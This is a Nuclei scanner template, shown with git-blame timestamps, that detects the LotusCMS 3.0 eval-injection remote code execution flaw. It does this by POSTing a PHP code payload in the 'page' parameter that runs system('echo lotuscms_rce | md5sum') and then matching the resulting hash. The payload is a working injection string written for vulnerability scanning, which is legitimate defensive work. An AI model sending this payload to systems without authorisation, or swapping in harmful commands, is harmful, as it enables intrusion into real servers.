nuclei-templates/http/vulnerabilities/other/lotuscms-rce.yaml

43 lines
1.2 KiB
YAML
Raw Permalink Normal View History

2021-07-04 11:11:19 +00:00
id: lotuscms-rce
info:
name: LotusCMS 3.0 - Remote Code Execution
2021-07-04 11:11:19 +00:00
author: pikpikcu
severity: critical
2022-05-31 08:56:43 +00:00
description: |
LotusCMS 3.0 is susceptible to remote code execution via the Router () function. This is done by embedding PHP code in the 'page' parameter, which will be passed to a eval call and allow remote code execution.
reference:
- https://github.com/Hood3dRob1n/LotusCMS-Exploit
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2023-10-14 11:27:55 +00:00
cvss-score: 10
cwe-id: CWE-77
metadata:
max-request: 2
2023-10-14 11:27:55 +00:00
tags: lotuscms,rce
2021-07-04 11:11:19 +00:00
http:
2021-07-04 11:11:19 +00:00
- method: POST
path:
- "{{BaseURL}}/index.php"
2021-07-04 11:39:45 +00:00
- "{{BaseURL}}/lcms/index.php"
2021-07-04 11:11:19 +00:00
headers:
Content-Type: application/x-www-form-urlencoded
2023-10-14 11:27:55 +00:00
2021-07-04 11:11:19 +00:00
body: |
2021-07-04 11:39:45 +00:00
page=index');${system('echo lotuscms_rce | md5sum')};#
2021-07-04 11:11:19 +00:00
matchers-condition: and
matchers:
- type: word
2022-05-31 08:56:43 +00:00
part: body
2021-07-04 11:11:19 +00:00
words:
2021-07-04 11:39:45 +00:00
- "38ee63071a04dc5e04ed22624c38e648"
2021-07-04 11:11:19 +00:00
- type: status
status:
- 200
# digest: 4a0a0047304502210080195f8997e2125d05b031fd5c31d069c08dde12cb560f1f35f4ae092cd7c78c02207df5154b26e14c573918e75933b5d0436d849c6a4808e31e789b5aecee99ce35:922c64590222798bb761d5b6d8e72950